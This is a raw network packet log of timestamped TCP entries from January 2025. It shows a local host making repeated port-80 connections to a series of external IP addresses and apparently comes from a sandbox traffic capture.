Jan 10, 2025 21:46:19.364053965 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.364089012 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.364120960 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.364123106 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.364162922 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.369108915 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.369143963 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.369180918 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.369215012 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.369267941 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.372637033 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.377443075 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:34.477936029 CET	49880	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:34.482788086 CET	80	49880	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:34.482855082 CET	49880	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:34.497371912 CET	49880	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:34.502172947 CET	80	49880	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:35.150031090 CET	80	49880	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:35.150096893 CET	80	49880	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:35.150253057 CET	49880	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:36.011338949 CET	49880	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:37.030100107 CET	49900	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:37.035028934 CET	80	49900	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:37.035092115 CET	49900	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:37.049901962 CET	49900	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:37.054714918 CET	80	49900	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:37.703555107 CET	80	49900	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:37.703689098 CET	80	49900	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:37.703872919 CET	49900	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:38.558212996 CET	49900	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:39.576898098 CET	49914	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:39.581717014 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.581785917 CET	49914	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:39.597009897 CET	49914	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:39.601787090 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.601860046 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.601871967 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.601916075 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.601927042 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.602025986 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.602037907 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.602087021 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:39.602099895 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:40.343188047 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:40.343206882 CET	80	49914	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:40.343267918 CET	49914	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:41.105222940 CET	49914	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:42.123647928 CET	49927	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:42.128509998 CET	80	49927	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:42.128587961 CET	49927	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:42.138081074 CET	49927	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:42.142936945 CET	80	49927	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:42.802758932 CET	80	49927	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:42.802772999 CET	80	49927	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:42.802984953 CET	49927	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:42.803411961 CET	80	49927	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:42.803473949 CET	49927	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:42.805860996 CET	49927	80	192.168.2.4	217.160.0.113
Jan 10, 2025 21:46:42.810619116 CET	80	49927	217.160.0.113	192.168.2.4
Jan 10, 2025 21:46:56.709063053 CET	50010	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:56.713907003 CET	80	50010	154.205.156.26	192.168.2.4
Jan 10, 2025 21:46:56.713980913 CET	50010	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:56.729383945 CET	50010	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:56.735111952 CET	80	50010	154.205.156.26	192.168.2.4
Jan 10, 2025 21:46:58.147804976 CET	80	50010	154.205.156.26	192.168.2.4
Jan 10, 2025 21:46:58.147876978 CET	80	50010	154.205.156.26	192.168.2.4
Jan 10, 2025 21:46:58.148004055 CET	50010	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:58.245801926 CET	50010	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:59.269083023 CET	50011	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:59.274018049 CET	80	50011	154.205.156.26	192.168.2.4
Jan 10, 2025 21:46:59.274159908 CET	50011	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:59.289797068 CET	50011	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:46:59.294625998 CET	80	50011	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:00.712687969 CET	80	50011	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:00.712739944 CET	80	50011	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:00.712935925 CET	50011	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:00.792627096 CET	50011	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:01.817425966 CET	50012	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:01.822326899 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.822413921 CET	50012	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:01.861349106 CET	50012	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:01.866296053 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866312027 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866333008 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866342068 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866350889 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866359949 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866369963 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866552114 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:01.866561890 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:03.258215904 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:03.258254051 CET	80	50012	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:03.258389950 CET	50012	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:03.370959997 CET	50012	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:04.389378071 CET	50013	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:04.394311905 CET	80	50013	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:04.394448042 CET	50013	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:04.403680086 CET	50013	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:04.408615112 CET	80	50013	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:05.928445101 CET	80	50013	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:05.928539038 CET	80	50013	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:05.928703070 CET	50013	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:05.931292057 CET	50013	80	192.168.2.4	154.205.156.26
Jan 10, 2025 21:47:05.936110020 CET	80	50013	154.205.156.26	192.168.2.4
Jan 10, 2025 21:47:11.807003975 CET	50014	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:11.811878920 CET	80	50014	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:11.811959028 CET	50014	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:11.826111078 CET	50014	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:11.830977917 CET	80	50014	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:12.719244957 CET	80	50014	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:12.719305992 CET	80	50014	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:12.719408989 CET	50014	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:13.339509010 CET	50014	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:14.358100891 CET	50015	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:14.363056898 CET	80	50015	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:14.363188028 CET	50015	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:14.377439022 CET	50015	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:14.382596970 CET	80	50015	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:15.269620895 CET	80	50015	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:15.269694090 CET	80	50015	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:15.269772053 CET	50015	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:15.886466980 CET	50015	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:16.906256914 CET	50016	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:16.911221981 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.911305904 CET	50016	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:16.927373886 CET	50016	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:16.935151100 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935167074 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935234070 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935246944 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935257912 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935271025 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935370922 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935384035 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:16.935395956 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:17.954737902 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:17.954864979 CET	80	50016	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:17.954979897 CET	50016	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:18.433948994 CET	50016	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:19.453073025 CET	50017	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:19.460172892 CET	80	50017	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:19.460329056 CET	50017	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:19.469851971 CET	50017	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:19.476632118 CET	80	50017	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:20.370652914 CET	80	50017	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:20.370769024 CET	80	50017	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:20.370831013 CET	50017	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:20.373648882 CET	50017	80	192.168.2.4	38.181.21.178
Jan 10, 2025 21:47:20.378571987 CET	80	50017	38.181.21.178	192.168.2.4
Jan 10, 2025 21:47:34.266840935 CET	50018	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:34.272273064 CET	80	50018	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:34.272411108 CET	50018	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:34.287465096 CET	50018	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:34.292370081 CET	80	50018	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:34.627940893 CET	80	50018	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:34.628077030 CET	50018	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:35.792848110 CET	50018	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:35.797775984 CET	80	50018	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:36.811337948 CET	50019	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:36.816414118 CET	80	50019	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:36.818591118 CET	50019	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:36.833579063 CET	50019	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:36.838566065 CET	80	50019	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:37.178484917 CET	80	50019	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:37.178595066 CET	50019	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:38.477623940 CET	50019	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:38.482574940 CET	80	50019	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.483330965 CET	50020	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:39.488389015 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.488466978 CET	50020	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:39.503130913 CET	50020	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:39.508074999 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508090973 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508218050 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508230925 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508243084 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508260012 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508271933 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508284092 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.508311987 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.857553959 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:39.857639074 CET	50020	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:41.031332970 CET	50020	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:41.036434889 CET	80	50020	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:42.045439959 CET	50021	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:42.050723076 CET	80	50021	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:42.051202059 CET	50021	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:42.060421944 CET	50021	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:42.065277100 CET	80	50021	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:42.705998898 CET	80	50021	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:42.706203938 CET	50021	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:42.707492113 CET	50021	80	192.168.2.4	23.167.152.41
Jan 10, 2025 21:47:42.712301016 CET	80	50021	23.167.152.41	192.168.2.4
Jan 10, 2025 21:47:48.380589962 CET	50022	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:48.385771036 CET	80	50022	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:48.385857105 CET	50022	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:48.399238110 CET	50022	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:48.404104948 CET	80	50022	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:49.357692957 CET	80	50022	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:49.357743025 CET	80	50022	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:49.357781887 CET	80	50022	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:49.357923031 CET	50022	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:49.995198011 CET	50022	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:51.034003019 CET	50023	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:51.039072990 CET	80	50023	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:51.039236069 CET	50023	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:51.059854031 CET	50023	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:51.064663887 CET	80	50023	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:52.018850088 CET	80	50023	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:52.018882036 CET	80	50023	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:52.018901110 CET	80	50023	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:52.018956900 CET	50023	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:52.574183941 CET	50023	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:53.642708063 CET	50024	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:53.647743940 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.647885084 CET	50024	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:53.667042017 CET	50024	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:53.672105074 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672122002 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672133923 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672177076 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672240019 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672265053 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672370911 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672380924 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:53.672414064 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:54.622895002 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:54.622992039 CET	50024	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:55.183377028 CET	50024	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:55.188271046 CET	80	50024	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:56.278496027 CET	50025	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:56.283494949 CET	80	50025	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:56.283570051 CET	50025	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:56.374545097 CET	50025	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:56.379395962 CET	80	50025	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:57.241643906 CET	80	50025	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:57.241667032 CET	80	50025	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:57.241684914 CET	80	50025	103.75.185.22	192.168.2.4
Jan 10, 2025 21:47:57.241868973 CET	50025	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:57.244625092 CET	50025	80	192.168.2.4	103.75.185.22
Jan 10, 2025 21:47:57.249380112 CET	80	50025	103.75.185.22	192.168.2.4
Jan 10, 2025 21:48:02.296642065 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:02.301556110 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:02.301655054 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:02.351139069 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:02.355952024 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104357004 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104379892 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104394913 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104412079 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104491949 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104506969 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104521990 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104537010 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104549885 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104566097 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.104648113 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.104648113 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.104648113 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.104648113 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.109601974 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.109617949 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.109636068 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.109651089 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.109667063 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.109680891 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.109724045 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.195374966 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.195393085 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.195410967 CET	80	50026	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:03.195466995 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.195522070 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:03.855217934 CET	50026	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:04.874073982 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:04.878978014 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:04.879091978 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:04.894244909 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:04.899033070 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478665113 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478683949 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478691101 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478703022 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478708982 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478715897 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478720903 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478727102 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478733063 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478739977 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.478750944 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:05.478795052 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:05.483606100 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.483618021 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.483624935 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.483630896 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.483695030 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:05.483899117 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.529526949 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:05.565460920 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.565474987 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.565553904 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:05.565607071 CET	80	50027	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:05.565699100 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:06.402415991 CET	50027	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:07.422106028 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:07.426938057 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.427203894 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:07.446753979 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:07.451617956 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.451639891 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.451761007 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.451771021 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.451817989 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.451827049 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.451838017 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.453208923 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:07.453218937 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260127068 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260143995 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260154963 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260168076 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260176897 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260190010 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260199070 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260309935 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260322094 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.260334015 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.261857986 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.261857986 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.261857986 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.261857986 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.266782999 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.266801119 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.266813993 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.266825914 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.266866922 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.266902924 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.328275919 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.348759890 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.348809958 CET	80	50028	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:08.348850965 CET	80	50028	162.0.213.94	192.168.2.4
